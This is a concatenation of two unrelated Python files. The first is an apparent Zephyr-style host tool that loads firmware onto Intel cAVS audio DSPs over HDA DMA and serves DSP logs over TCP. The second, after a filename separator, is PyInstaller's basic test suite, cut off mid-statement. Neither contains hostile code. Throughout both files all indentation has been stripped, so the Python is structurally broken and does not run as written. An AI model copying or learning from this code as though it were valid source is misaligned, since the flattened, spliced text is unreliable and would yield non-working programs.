# create two buffers in the page of buf_len and mark them
# in a buffer descriptor list for the hardware to use
buf0_len = buf_len
buf1_len = buf_len
bdl_off = buf0_len + buf1_len
# bdl is 2 (64bits, 16 bytes) per entry, we have two
mem[bdl_off:bdl_off + 32] = struct.pack("<QQQQ",
phys_addr,
buf0_len,
phys_addr + buf0_len,
buf1_len)
dpib_off = bdl_off+32
# ensure buffer is initialized, sanity
for i in range(0, buf_len*2):
mem[i] = 0
log.info("Filled the buffer descriptor list (BDL) for DMA.")
return (mem, hugef, phys_addr + bdl_off, phys_addr+dpib_off, 2)
def debug(self):
log.info("HDA %d: PPROC %d, CTL 0x%x, LPIB 0x%x, BDPU 0x%x, BDPL 0x%x, CBL 0x%x, LVI 0x%x",
self.stream_id, (hda.PPCTL >> self.stream_id) & 1, self.regs.CTL, self.regs.LPIB, self.regs.BDPU,
self.regs.BDPL, self.regs.CBL, self.regs.LVI)
log.info(" FIFOW %d, FIFOS %d, FMT %x, FIFOL %d, DPIB %d, EFIFOS %d",
self.regs.FIFOW & 0x7, self.regs.FIFOS, self.regs.FMT, self.regs.FIFOL, self.dbg0.DPIB, self.dbg0.EFIFOS)
log.info(" status: FIFORDY %d, DESE %d, FIFOE %d, BCIS %d",
(self.regs.STS >> 5) & 1, (self.regs.STS >> 4) & 1, (self.regs.STS >> 3) & 1, (self.regs.STS >> 2) & 1)
def reset(self):
# Turn DMA off and reset the stream. Clearing START first is a
# noop per the spec, but absolutely required for stability.
# Apparently the reset doesn't stop the stream, and the next load
# starts before it's ready and kills the load (and often the DSP).
# The sleep too is required, on at least one board (a fast
# chromebook) putting the two writes next each other also hangs
# the DSP!
log.info(f"Resetting stream {self.stream_id}")
self.debug()
self.regs.CTL &= ~2 # clear START
time.sleep(0.1)
# set enter reset bit
self.regs.CTL = 1
while (self.regs.CTL & 1) == 0: pass
# clear enter reset bit to exit reset
self.regs.CTL = 0
while (self.regs.CTL & 1) == 1: pass
log.info(f"Disable SPIB and set position 0 of stream {self.stream_id}")
self.hda.SPBFCTL = 0
self.hda.SPIB = 0
#log.info("Setting dma position buffer and enable it")
#self.hda.DPUBASE = self.pos_buf_addr >> 32 & 0xffffffff
#self.hda.DPLBASE = self.pos_buf_addr & 0xfffffff0 | 1
log.info(f"Enabling dsp capture (PROCEN) of stream {self.stream_id}")
self.hda.PPCTL |= (1 << self.stream_id)
self.debug()
log.info(f"Reset stream {self.stream_id}")
def map_regs():
p = runx(f"grep -iPl 'PCI_CLASS=40(10|38)0' /sys/bus/pci/devices/*/uevent")
pcidir = os.path.dirname(p)
# Platform/quirk detection. ID lists cribbed from the SOF kernel driver
global cavs15, cavs18, cavs25
did = int(open(f"{pcidir}/device").read().rstrip(), 16)
cavs15 = did in [ 0x5a98, 0x1a98, 0x3198 ]
cavs18 = did in [ 0x9dc8, 0xa348, 0x02c8, 0x06c8, 0xa3f0 ]
cavs25 = did in [ 0xa0c8, 0x43c8, 0x4b55, 0x4b58, 0x7ad0, 0x51c8 ]
# Check sysfs for a loaded driver and remove it
if os.path.exists(f"{pcidir}/driver"):
mod = os.path.basename(os.readlink(f"{pcidir}/driver/module"))
found_msg = f"Existing driver \"{mod}\" found"
if args.log_only:
log.info(found_msg)
else:
log.warning(found_msg + ", unloading module")
runx(f"rmmod -f {mod}")
# Disengage runtime power management so the kernel doesn't put it to sleep
with open(f"{pcidir}/power/control", "w") as ctrl:
ctrl.write("on")
# Make sure PCI memory space access and busmastering are enabled.
# Also disable interrupts so as not to confuse the kernel.
with open(f"{pcidir}/config", "wb+") as cfg:
cfg.seek(4)
cfg.write(b'\x06\x04')
# Standard HD Audio Registers
global hdamem
(hdamem, _) = bar_map(pcidir, 0)
hda = Regs(hdamem)
hda.GCAP = 0x0000
hda.GCTL = 0x0008
hda.SPBFCTL = 0x0704
hda.PPCTL = 0x0804
# Find the ID of the first output stream
hda_ostream_id = (hda.GCAP >> 8) & 0x0f # number of input streams
log.info(f"Selected output stream {hda_ostream_id} (GCAP = 0x{hda.GCAP:x})")
hda.SD_SPIB = 0x0708 + (8 * hda_ostream_id)
hda.freeze()
# Standard HD Audio Stream Descriptor
sd = Regs(hdamem + 0x0080 + (hda_ostream_id * 0x20))
sd.CTL = 0x00
sd.CBL = 0x08
sd.LVI = 0x0c
sd.BDPL = 0x18
sd.BDPU = 0x1c
sd.freeze()
# Intel Audio DSP Registers
global bar4_mmap
(bar4_mem, bar4_mmap) = bar_map(pcidir, 4)
dsp = Regs(bar4_mem)
dsp.ADSPCS = 0x00004
dsp.HIPCTDR = 0x00040 if cavs15 else 0x000c0
dsp.HIPCTDA = 0x000c4 # 1.8+ only
dsp.HIPCTDD = 0x00044 if cavs15 else 0x000c8
dsp.HIPCIDR = 0x00048 if cavs15 else 0x000d0
dsp.HIPCIDA = 0x000d4 # 1.8+ only
dsp.HIPCIDD = 0x0004c if cavs15 else 0x000d8
dsp.SRAM_FW_STATUS = 0x80000 # Start of first SRAM window
dsp.freeze()
return (hda, sd, dsp, hda_ostream_id)
def setup_dma_mem(fw_bytes):
(mem, phys_addr, _) = map_phys_mem(hda_ostream_id)
mem[0:len(fw_bytes)] = fw_bytes
log.info("Mapped 2M huge page at 0x%x to contain %d bytes of firmware"
% (phys_addr, len(fw_bytes)))
# HDA requires at least two buffers be defined, but we don't care about
# boundaries because it's all a contiguous region. Place a vestigial
# 128-byte (minimum size and alignment) buffer after the main one, and put
# the 4-entry BDL list into the final 128 bytes of the page.
buf0_len = HUGEPAGESZ - 2 * 128
buf1_len = 128
bdl_off = buf0_len + buf1_len
mem[bdl_off:bdl_off + 32] = struct.pack("<QQQQ",
phys_addr, buf0_len,
phys_addr + buf0_len, buf1_len)
log.info("Filled the buffer descriptor list (BDL) for DMA.")
return (phys_addr + bdl_off, 2)
global_mmaps = [] # protect mmap mappings from garbage collection!
# Maps 2M of contiguous memory using a single page from hugetlbfs,
# then locates its physical address for use as a DMA buffer.
def map_phys_mem(stream_id):
# Make sure hugetlbfs is mounted (not there on chromeos)
os.system("mount | grep -q hugetlbfs ||"
+ " (mkdir -p /dev/hugepages; "
+ " mount -t hugetlbfs hugetlbfs /dev/hugepages)")
# Ensure the kernel has enough budget for one new page
free = int(runx("awk '/HugePages_Free/ {print $2}' /proc/meminfo"))
if free == 0:
tot = 1 + int(runx("awk '/HugePages_Total/ {print $2}' /proc/meminfo"))
os.system(f"echo {tot} > /proc/sys/vm/nr_hugepages")
hugef_name = HUGEPAGE_FILE + str(stream_id)
hugef = open(hugef_name, "w+")
hugef.truncate(HUGEPAGESZ)
mem = mmap.mmap(hugef.fileno(), HUGEPAGESZ)
log.info("type of mem is %s", str(type(mem)))
global_mmaps.append(mem)
os.unlink(hugef_name)
# Find the local process address of the mapping, then use that to extract
# the physical address from the kernel's pagemap interface. The physical
# page frame number occupies the bottom bits of the entry.
mem[0] = 0 # Fault the page in so it has an address!
vaddr = ctypes.addressof(ctypes.c_int.from_buffer(mem))
vpagenum = vaddr >> 12
pagemap = open("/proc/self/pagemap", "rb")
pagemap.seek(vpagenum * 8)
pent = pagemap.read(8)
paddr = (struct.unpack("Q", pent)[0] & ((1 << 55) - 1)) * PAGESZ
pagemap.close()
return (mem, paddr, hugef)
# Maps a PCI BAR and returns the in-process address
def bar_map(pcidir, barnum):
f = open(pcidir + "/resource" + str(barnum), "r+")
mm = mmap.mmap(f.fileno(), os.fstat(f.fileno()).st_size)
global_mmaps.append(mm)
log.info("Mapped PCI bar %d of length %d bytes."
% (barnum, os.fstat(f.fileno()).st_size))
return (ctypes.addressof(ctypes.c_int.from_buffer(mm)), mm)
# Syntactic sugar to make register block definition & use look nice.
# Instantiate from a base address, assign offsets to (uint32) named registers as
# fields, call freeze(), then the field acts as a direct alias for the register!
class Regs:
def __init__(self, base_addr):
vars(self)["base_addr"] = base_addr
vars(self)["ptrs"] = {}
vars(self)["frozen"] = False
def freeze(self):
vars(self)["frozen"] = True
def __setattr__(self, name, val):
if not self.frozen and name not in self.ptrs:
addr = self.base_addr + val
self.ptrs[name] = ctypes.c_uint32.from_address(addr)
else:
self.ptrs[name].value = val
def __getattr__(self, name):
return self.ptrs[name].value
def runx(cmd):
return subprocess.check_output(cmd, shell=True).decode().rstrip()
def load_firmware(fw_file):
try:
fw_bytes = open(fw_file, "rb").read()
except Exception as e:
log.error(f"Could not read firmware file: `{fw_file}'")
log.error(e)
sys.exit(1)
(magic, sz) = struct.unpack("4sI", fw_bytes[0:8])
if magic == b'XMan':
log.info(f"Trimming {sz} bytes of extended manifest")
fw_bytes = fw_bytes[sz:len(fw_bytes)]
# This actually means "enable access to BAR4 registers"!
hda.PPCTL |= (1 << 30) # GPROCEN, "global processing enable"
log.info("Resetting HDA device")
hda.GCTL = 0
while hda.GCTL & 1: pass
hda.GCTL = 1
while not hda.GCTL & 1: pass
log.info("Powering down DSP cores")
dsp.ADSPCS = 0xffff
while dsp.ADSPCS & 0xff000000: pass
log.info(f"Configuring HDA stream {hda_ostream_id} to transfer firmware image")
(buf_list_addr, num_bufs) = setup_dma_mem(fw_bytes)
sd.CTL = 1
while (sd.CTL & 1) == 0: pass
sd.CTL = 0
while (sd.CTL & 1) == 1: pass
sd.CTL = (1 << 20) # Set stream ID to anything non-zero
sd.BDPU = (buf_list_addr >> 32) & 0xffffffff
sd.BDPL = buf_list_addr & 0xffffffff
sd.CBL = len(fw_bytes)
sd.LVI = num_bufs - 1
hda.PPCTL |= (1 << hda_ostream_id)
# SPIB ("Software Position In Buffer") is an Intel HDA extension
# that puts a transfer boundary into the stream beyond which the
# other side will not read. The ROM wants to poll on a "buffer
# full" bit on the other side that only works with this enabled.
hda.SPBFCTL |= (1 << hda_ostream_id)
hda.SD_SPIB = len(fw_bytes)
# Start DSP. Host needs to provide power to all cores on 1.5
# (which also starts them) and 1.8 (merely gates power, DSP also
# has to set PWRCTL). The bits for cores other than 0 are ignored
# on 2.5 where the DSP has full control.
log.info(f"Starting DSP, ADSPCS = 0x{dsp.ADSPCS:x}")
dsp.ADSPCS = 0xff0000 if not cavs25 else 0x01fefe
while (dsp.ADSPCS & 0x1000000) == 0: pass
# Wait for the ROM to boot and signal it's ready. This short
# sleep seems to be needed; if we're banging on the memory window
# during initial boot (before/while the window control registers
# are configured?) the DSP hardware will hang fairly reliably.
log.info("Wait for ROM startup")
time.sleep(0.1)
while (dsp.SRAM_FW_STATUS >> 24) != 5: pass
# Send the DSP an IPC message to tell the device how to boot.
# Note: with cAVS 1.8+ the ROM receives the stream argument as an
# index within the array of output streams (and we always use the
# first one by construction). But with 1.5 it's the HDA index,
# and depends on the number of input streams on the device.
stream_idx = hda_ostream_id if cavs15 else 0
ipcval = ( (1 << 31) # BUSY bit
| (0x01 << 24) # type = PURGE_FW
| (1 << 14) # purge_fw = 1
| (stream_idx << 9)) # dma_id
log.info(f"Sending IPC command, HIPIDR = 0x{ipcval:x}")
dsp.HIPCIDR = ipcval
log.info(f"Starting DMA, FW_STATUS = 0x{dsp.SRAM_FW_STATUS:x}")
sd.CTL |= 2 # START flag
wait_fw_entered()
# Turn DMA off and reset the stream. Clearing START first is a
# noop per the spec, but absolutely required for stability.
# Apparently the reset doesn't stop the stream, and the next load
# starts before it's ready and kills the load (and often the DSP).
# The sleep too is required, on at least one board (a fast
# chromebook) putting the two writes next each other also hangs
# the DSP!
sd.CTL &= ~2 # clear START
time.sleep(0.1)
sd.CTL |= 1
log.info(f"cAVS firmware load complete")
def wait_fw_entered():
log.info("Waiting for firmware handoff, FW_STATUS = 0x%x", dsp.SRAM_FW_STATUS)
for _ in range(200):
alive = dsp.SRAM_FW_STATUS & ((1 << 28) - 1) == 5 # "FW_ENTERED"
if alive:
break
time.sleep(0.01)
if not alive:
log.warning("Load failed? FW_STATUS = 0x%x", dsp.SRAM_FW_STATUS)
# This SHOULD be just "mem[start:start+length]", but slicing an mmap
# array seems to be unreliable on one of my machines (python 3.6.9 on
# Ubuntu 18.04). Read out bytes individually.
def win_read(start, length):
try:
return b''.join(bar4_mmap[WINSTREAM_OFFSET + x].to_bytes(1, 'little')
for x in range(start, start + length))
except IndexError as ie:
# A FW in a bad state may cause winstream garbage
log.error("IndexError in bar4_mmap[%d + %d]", WINSTREAM_OFFSET, start)
log.error("bar4_mmap.size()=%d", bar4_mmap.size())
raise ie
def win_hdr():
return struct.unpack("<IIII", win_read(0, 16))
# Python implementation of the same algorithm in sys_winstream_read(),
# see there for details.
def winstream_read(last_seq):
while True:
(wlen, start, end, seq) = win_hdr()
if last_seq == 0:
last_seq = seq if args.no_history else (seq - ((end - start) % wlen))
if seq == last_seq or start == end:
return (seq, "")
behind = seq - last_seq
if behind > ((end - start) % wlen):
return (seq, "")
copy = (end - behind) % wlen
suffix = min(behind, wlen - copy)
result = win_read(16 + copy, suffix)
if suffix < behind:
result += win_read(16, behind - suffix)
(wlen, start1, end, seq1) = win_hdr()
if start1 == start and seq1 == seq:
# Best effort attempt at decoding, replacing unusable characters
# Found to be useful when it really goes wrong
return (seq, result.decode("utf-8", "replace"))
async def ipc_delay_done():
await asyncio.sleep(0.1)
dsp.HIPCTDA = 1<<31
ipc_timestamp = 0
# Super-simple command language, driven by the test code on the DSP
def ipc_command(data, ext_data):
send_msg = False
done = True
log.debug ("ipc data %d, ext_data %x", data, ext_data)
if data == 0: # noop, with synchronous DONE
pass
elif data == 1: # async command: signal DONE after a delay (on 1.8+)
if not cavs15:
done = False
asyncio.ensure_future(ipc_delay_done())
elif data == 2: # echo back ext_data as a message command
send_msg = True
elif data == 3: # set ADSPCS
dsp.ADSPCS = ext_data
elif data == 4: # echo back microseconds since last timestamp command
global ipc_timestamp
t = round(time.time() * 1e6)
ext_data = t - ipc_timestamp
ipc_timestamp = t
send_msg = True
elif data == 5: # copy word at outbox[ext_data >> 16] to inbox[ext_data & 0xffff]
src = OUTBOX_OFFSET + 4 * (ext_data >> 16)
dst = INBOX_OFFSET + 4 * (ext_data & 0xffff)
for i in range(4):
bar4_mmap[dst + i] = bar4_mmap[src + i]
elif data == 6: # HDA RESET (init if not exists)
stream_id = ext_data & 0xff
if stream_id in hda_streams:
hda_streams[stream_id].reset()
else:
hda_str = HDAStream(stream_id)
hda_streams[stream_id] = hda_str
elif data == 7: # HDA CONFIG
stream_id = ext_data & 0xFF
buf_len = ext_data >> 8 & 0xFFFF
hda_str = hda_streams[stream_id]
hda_str.config(buf_len)
elif data == 8: # HDA START
stream_id = ext_data & 0xFF
hda_streams[stream_id].start()
hda_streams[stream_id].mem.seek(0)
elif data == 9: # HDA STOP
stream_id = ext_data & 0xFF
hda_streams[stream_id].stop()
elif data == 10: # HDA VALIDATE
stream_id = ext_data & 0xFF
hda_str = hda_streams[stream_id]
hda_str.debug()
is_ramp_data = True
hda_str.mem.seek(0)
for (i, val) in enumerate(hda_str.mem.read(256)):
if i != val:
is_ramp_data = False
# log.info("stream[%d][%d]: %d", stream_id, i, val) # debug helper
log.info("Is ramp data? " + str(is_ramp_data))
ext_data = int(is_ramp_data)
log.info(f"Ext data to send back on ramp status {ext_data}")
send_msg = True
elif data == 11: # HDA HOST OUT SEND
stream_id = ext_data & 0xff
buf = bytearray(256)
for i in range(0, 256):
buf[i] = i
hda_streams[stream_id].write(buf)
elif data == 12: # HDA PRINT
log.info("Doing HDA Print")
stream_id = ext_data & 0xFF
buf_len = ext_data >> 8 & 0xFFFF
hda_str = hda_streams[stream_id]
pos = hda_str.mem.tell()
buf_data = hda_str.mem.read(buf_len).decode("utf-8", "replace")
log.info(f"DSP LOG MSG (idx: {pos}, len: {buf_len}): {buf_data}")
pos = hda_str.mem.tell()
if pos >= hda_str.buf_len*2:
log.info(f"Wrapping log reader, pos {pos} len {hda_str.buf_len}")
hda_str.mem.seek(0)
else:
log.warning(f"cavstool: Unrecognized IPC command 0x{data:x} ext 0x{ext_data:x}")
dsp.HIPCTDR = 1<<31 # Ack local interrupt, also signals DONE on v1.5
if cavs18:
time.sleep(0.01) # Needed on 1.8, or the command below won't send!
if done and not cavs15:
dsp.HIPCTDA = 1<<31 # Signal done
if send_msg:
dsp.HIPCIDD = ext_data
dsp.HIPCIDR = (1<<31) | ext_data
async def _main(server):
#TODO this bit me, remove the globals, write a little FirmwareLoader class or something to contain.
global hda, sd, dsp, hda_ostream_id, hda_streams
try:
(hda, sd, dsp, hda_ostream_id) = map_regs()
except Exception as e:
log.error("Could not map device in sysfs; run as root?")
log.error(e)
sys.exit(1)
log.info(f"Detected cAVS {'1.5' if cavs15 else '1.8+'} hardware")
if args.log_only:
wait_fw_entered()
else:
if not fw_file:
log.error("Firmware file argument missing")
sys.exit(1)
load_firmware(fw_file)
time.sleep(0.1)
if not args.quiet:
adsp_log("--\n", server)
hda_streams = dict()
last_seq = 0
while start_output is True:
await asyncio.sleep(0.03)
(last_seq, output) = winstream_read(last_seq)
if output:
adsp_log(output, server)
if dsp.HIPCTDR & 0x80000000:
ipc_command(dsp.HIPCTDR & ~0x80000000, dsp.HIPCTDD)
if dsp.HIPCIDA & 0x80000000:
dsp.HIPCIDA = 1<<31 # must ACK any DONE interrupts that arrive!
class adsp_request_handler(socketserver.BaseRequestHandler):
"""
The request handler class for control the actions of server.
"""
def receive_fw(self, filename):
try:
with open(fw_file,'wb') as f:
cnt = 0
log.info("Receiving...")
while True:
l = self.request.recv(BUF_SIZE)
ll = len(l)
cnt = cnt + ll
if not l:
break
else:
f.write(l)
except Exception as e:
log.error(f"Get exception {e} during FW transfer.")
return 1
log.info(f"Done Receiving {cnt}.")
def handle(self):
global start_output, fw_file
cmd = self.request.recv(BUF_SIZE)
log.info(f"{self.client_address[0]} wrote: {cmd}")
action = cmd.decode("utf-8")
log.debug(f'load {action}')
if action == CMD_DOWNLOAD:
self.request.sendall(cmd)
recv_fn = self.request.recv(BUF_SIZE)
log.info(f"{self.client_address[0]} wrote: {recv_fn}")
try:
tmp_file = recv_fn.decode("utf-8")
except UnicodeDecodeError:
tmp_file = "zephyr.ri.decode_error"
log.info(f'did not receive a correct filename')
lock.acquire()
fw_file = tmp_file
ret = self.receive_fw(fw_file)
if not ret:
start_output = True
lock.release()
log.debug(f'{recv_fn}, {fw_file}, {start_output}')
elif action == CMD_LOG_STOP:
self.request.sendall(cmd)
lock.acquire()
start_output = False
if fw_file:
os.remove(fw_file)
fw_file = None
lock.release()
else:
log.error("incorrect load communitcation!")
class adsp_log_handler(socketserver.BaseRequestHandler):
"""
The log handler class for grabbing output messages of server.
"""
def run_adsp(self):
self.loop = asyncio.get_event_loop()
self.loop.run_until_complete(_main(self))
def handle(self):
global start_output, fw_file
cmd = self.request.recv(BUF_SIZE)
log.info(f"{self.client_address[0]} wrote: {cmd}")
action = cmd.decode("utf-8")
log.debug(f'monitor {action}')
if action == CMD_LOG_START:
self.request.sendall(cmd)
log.info(f"Waiting for instruction...")
while start_output is False:
time.sleep(1)
log.info(f"Loaded FW {fw_file} and running...")
if os.path.exists(fw_file):
self.run_adsp()
self.request.sendall("service complete.".encode())
log.info("service complete.")
else:
log.error("cannot find the FW file")
lock.acquire()
fw_file = None
start_output = False
lock.release()
else:
log.error("incorrect monitor communitcation!")
def adsp_log(output, server):
if server:
server.request.sendall(output.encode("utf-8"))
else:
sys.stdout.write(output)
sys.stdout.flush()
def get_host_ip():
"""
Helper tool use to detect host's serving ip address.
"""
interfaces = netifaces.interfaces()
for i in interfaces:
if i != "lo":
try:
netifaces.ifaddresses(i)
ip = netifaces.ifaddresses(i)[netifaces.AF_INET][0]['addr']
log.info (f"Use interface {i}, IP address: {ip}")
except Exception:
log.info(f"Ignore the interface {i} which is not activated.")
return ip
ap = argparse.ArgumentParser(description="DSP loader/logger tool")
ap.add_argument("-q", "--quiet", action="store_true",
help="No loader output, just DSP logging")
ap.add_argument("-l", "--log-only", action="store_true",
help="Don't load firmware, just show log output")
ap.add_argument("-n", "--no-history", action="store_true",
help="No current log buffer at start, just new output")
ap.add_argument("-s", "--server-addr",
help="No current log buffer at start, just new output")
ap.add_argument("fw_file", nargs="?", help="Firmware file")
args = ap.parse_args()
if args.quiet:
log.setLevel(logging.WARN)
if args.fw_file:
fw_file = args.fw_file
else:
fw_file = None
if args.server_addr:
HOST = args.server_addr
else:
HOST = get_host_ip()
if __name__ == "__main__":
# Launch the command request service
socketserver.TCPServer.allow_reuse_address = True
req_server = socketserver.TCPServer((HOST, PORT_REQ), adsp_request_handler)
req_t = threading.Thread(target=req_server.serve_forever, daemon=True)
# Activate the log service which output adsp execution
with socketserver.TCPServer((HOST, PORT_LOG), adsp_log_handler) as log_server:
try:
log.info("Req server start...")
req_t.start()
log.info("Log server start...")
log_server.serve_forever()
except KeyboardInterrupt:
lock.acquire()
start_output = False
lock.release()
log_server.shutdown()
req_server.shutdown()
|
test_basic.py
|
# -*- coding: utf-8 -*-
#-----------------------------------------------------------------------------
# Copyright (c) 2005-2022, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License (version 2
# or later) with exception for distributing the bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#
# SPDX-License-Identifier: (GPL-2.0-or-later WITH Bootloader-exception)
#-----------------------------------------------------------------------------
import locale
import os
import sys
import shutil
import pytest
from PyInstaller.compat import is_darwin, is_win
from PyInstaller.utils.tests import importorskip, skipif, skipif_no_compiler, xfail
def test_run_from_path_environ(pyi_builder):
pyi_builder.test_script('pyi_absolute_python_path.py', run_from_path=True)
@pytest.mark.linux
def test_absolute_ld_library_path(pyi_builder):
pyi_builder.test_script('pyi_absolute_ld_library_path.py')
def test_absolute_python_path(pyi_builder):
pyi_builder.test_script('pyi_absolute_python_path.py')
@pytest.mark.linux
@skipif(not os.path.exists('/proc/self/status'), reason='/proc/self/status does not exist')
@pytest.mark.parametrize("symlink_name", ["symlink", "very_long_name_in_symlink", "sub/dir/progam"])
def test_symlink_basename_is_kept(pyi_builder_spec, symlink_name, tmpdir, SPEC_DIR, SCRIPT_DIR):
def patch(spec_name, symlink_name):
content = SPEC_DIR.join(spec_name).read_text(encoding="utf-8")
content = content.replace("@SYMLINKNAME@", symlink_name)
content = content.replace("@SCRIPTDIR@", str(SCRIPT_DIR))
outspec = tmpdir.join(spec_name)
outspec.write_text(content, encoding="utf-8", ensure=True)
return outspec
specfile = patch("symlink_basename_is_kept.spec", symlink_name)
pyi_builder_spec.test_spec(str(specfile), app_name=symlink_name)
def test_pyz_as_external_file(pyi_builder, monkeypatch):
# This tests the not well documented and seldom used feature of having the PYZ-archive in a separate file (.pkg).
def MyEXE(*args, **kwargs):
kwargs['append_pkg'] = False
return EXE(*args, **kwargs)
# :todo: find a better way to not even run this test in onefile-mode
if pyi_builder._mode == 'onefile':
pytest.skip('only --onedir')
import PyInstaller.building.build_main
EXE = PyInstaller.building.build_main.EXE
monkeypatch.setattr('PyInstaller.building.build_main.EXE', MyEXE)
pyi_builder.test_source("print('Hello Python!')")
def test_base_modules_regex(pyi_builder):
"""
Verify that the regex for excluding modules listed in PY3_BASE_MODULES does not exclude other modules.
"""
pyi_builder.test_source("""
import resources_testmod
print('OK')
""")
def test_celementtree(pyi_builder):
pyi_builder.test_source("""
from xml.etree.cElementTree import ElementTree
print('OK')
""")
# Test a build with some complexity with the ``noarchive`` debug option.
def test_noarchive(pyi_builder):
pyi_builder.test_source("from xml.etree.cElementTree import ElementTree", pyi_args=['--debug=noarchive'])
@importorskip('codecs')
def test_codecs(pyi_builder):
pyi_builder.test_script('pyi_codecs.py')
def test_compiled_filenames(pyi_builder):
pyi_builder.test_source(
"""
import pyi_dummy_module
from os.path import isabs
assert not isabs(pyi_dummy_module.dummy.__code__.co_filename), (
"pyi_dummy_module.dummy.__code__.co_filename has compiled filename: %s" %
(pyi_dummy_module.dummy.__code__.co_filename, )
)
assert not isabs(pyi_dummy_module.DummyClass.dummyMethod.__code__.co_filename), (
"pyi_dummy_module.DummyClass.dummyMethod.__code__.co_filename has compiled filename: %s" %
(pyi_dummy_module.DummyClass.dummyMethod.__code__.co_filename, )
)
"""
)
def test_decoders_ascii(pyi_builder):
pyi_builder.test_source(
"""
# Convert type 'bytes' to type 'str'.
assert b'foo'.decode('ascii') == 'foo'
"""
)
def test_distutils_submod(pyi_builder):
# Test import of submodules of distutils package.
# PyI fails to include `distutils.version` when running from virtualenv.
pyi_builder.test_source("""
from distutils.version import LooseVersion
""")
def test_dynamic_module(pyi_builder):
pyi_builder.test_source(
"""
import pyi_testmod_dynamic
# The value 'foo' should not be None.
print("'foo' value: %s" % pyi_testmod_dynamic.foo)
assert pyi_testmod_dynamic.foo is not None
assert pyi_testmod_dynamic.foo == 'A new value!'
"""
)
def test_email(pyi_builder):
pyi_builder.test_source(
"""
from email import utils
from email.header import Header
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.nonmultipart import MIMENonMultipart
"""
)
@importorskip('tinyaes')
def test_feature_crypto(pyi_builder):
pyi_builder.test_source(
"""
from pyimod00_crypto_key import key
from pyimod02_archive import CRYPT_BLOCK_SIZE
# Test against issue #1663: importing a package in the bootstrap
# phase should not interfere with subsequent imports.
import tinyaes
assert type(key) is str
# The test runner uses 'test_key' as key.
assert key == 'test_key'.zfill(CRYPT_BLOCK_SIZE)
""",
pyi_args=['--key=test_key']
)
def test_feature_nocrypto(pyi_builder):
pyi_builder.test_source(
"""
try:
import pyimod00_crypto_key
raise AssertionError('The pyimod00_crypto_key module must NOT be there if crypto is disabled.')
except ImportError:
pass
"""
)
def test_filename(pyi_builder):
pyi_builder.test_script('pyi_filename.py')
def test_getfilesystemencoding(pyi_builder):
pyi_builder.test_script('pyi_getfilesystemencoding.py')
def test_helloworld(pyi_builder):
pyi_builder.test_source("print('Hello Python!')")
def test_module__file__attribute(pyi_builder):
pyi_builder.test_script('pyi_module__file__attribute.py')
def test_module_attributes(tmpdir, pyi_builder):
# Create file in tmpdir with path to python executable and if it is running in debug mode.
# Test script uses python interpreter to compare module attributes.
with open(os.path.join(tmpdir.strpath, 'python_exe.build'), 'w') as f:
f.write(sys.executable + "\n")
f.write('debug=%s' % __debug__ + '\n')
# On Windows we need to preserve systme PATH for subprocesses in tests.
f.write(os.environ.get('PATH') + '\n')
pyi_builder.test_script('pyi_module_attributes.py')
def test_module_reload(pyi_builder):
pyi_builder.test_script('pyi_module_reload.py')
def test_ctypes_hooks_are_in_place(pyi_builder):
pyi_builder.test_source(
"""
import ctypes
assert ctypes.CDLL.__name__ == 'PyInstallerCDLL', ctypes.CDLL
"""
)
# TODO test it on OS X.
@skipif_no_compiler
def test_load_dll_using_ctypes(monkeypatch, pyi_builder, compiled_dylib):
# Note that including the data_dir fixture copies files needed by this test.
#
# TODO: make sure PyInstaller is able to find the library and bundle it with the app.
# # If the required dylib does not reside in the current directory, the Analysis class machinery,
# # based on ctypes.util.find_library, will not find it. This was done on purpose for this test,
# # to show how to give Analysis class a clue.
# if is_win:
# os.environ['PATH'] = os.path.abspath(CTYPES_DIR) + ';' + os.environ['PATH']
# else:
# os.environ['LD_LIBRARY_PATH'] = CTYPES_DIR
# os.environ['DYLD_LIBRARY_PATH'] = CTYPES_DIR
# os.environ['LIBPATH'] = CTYPES_DIR
# Build and run the app.
pyi_builder.test_script('pyi_load_dll_using_ctypes.py')
def test_get_meipass_value(pyi_builder):
pyi_builder.test_script('pyi_get_meipass_value.py')
def test_chdir_meipass(pyi_builder):
# Ensure meipass dir exists.
pyi_builder.test_source(
"""
import os, sys
os.chdir(sys._MEIPASS)
print(os.getcwd())
"""
)
def test_option_exclude_module(pyi_builder):
"""
Test to ensure that when using option --exclude-module=xml.sax
the module 'xml.sax' won't be bundled.
"""
pyi_builder.test_source(
"""
try:
import xml.sax
# Option --exclude-module=xml.sax did not work and the module
# was successfully imported.
raise SystemExit('Module xml.sax was excluded but it is '
'bundled with the executable.')
except ImportError:
# The Import error is expected since PyInstaller should
# not bundle 'xml.sax' module.
pass
""",
pyi_args=['--exclude-module', 'xml.sax']
)
def test_option_verbose(pyi_builder, monkeypatch):
"""
Test to ensure that option V can be set and has effect.
"""
# This option is like 'python -v' - trace import statements.
# 'None' should be allowed or '' also.
def MyEXE(*args, **kwargs):
args = list(args)
args.append([('v', None, 'OPTION')])
return EXE(*args, **kwargs)
import PyInstaller.building.build_main
EXE = PyInstaller.building.build_main.EXE
monkeypatch.setattr('PyInstaller.building.build_main.EXE', MyEXE)
pyi_builder.test_source(
"""
print('test - PYTHONVERBOSE - trace import statements')
import re # just import anything
print('test - done')
"""
)
def test_option_w_unset(pyi_builder):
"""
Test to ensure that option W is not set by default.
"""
pyi_builder.test_source("""
import sys
assert 'ignore' not in sys.warnoptions
""")
def test_option_w_ignore(pyi_builder, monkeypatch, capsys):
"""
Test to ensure that option W can be set.
"""
def MyEXE(*args, **kwargs):
args = list(args)
args.append([('W ignore', '', 'OPTION')])
return EXE(*args, **kwargs)
import PyInstaller.building.build_main
EXE = PyInstaller.building.build_main.EXE
monkeypatch.setattr('PyInstaller.building.build_main.EXE', MyEXE)
pyi_builder.test_source("""
import sys
assert 'ignore' in sys.warnoptions
""")
_, err = capsys.readouterr()
assert "'import warnings' failed" not in err
@pytest.mark.parametrize("distutils", ["", "from distutils "])
def test_python_makefile(pyi_builder, distutils):
"""
Tests hooks for ``sysconfig`` and its near-duplicate ``distutils.sysconfig``. Raises an import error if we fail
to collect the special module that contains the details from pyconfig.h and the Makefile.
"""
# Ideally we would test that the contents of `sysconfig.get_config_vars()` dict are the same frozen vs. unfrozen,
# but because some values are paths into a Python installation's guts, these will point into the frozen app when
# frozen, and therefore not match. Without some fiddly filtering of the paths, this is impossible.
# As a compromise, test that the dictionary keys are the same to be sure that there is no conditional initialisation
# of get_config_vars(). I.e., that get_config_vars() does not silently return an empty dictionary if it cannot find
# the information it needs.
if distutils:
from distutils import sysconfig
else:
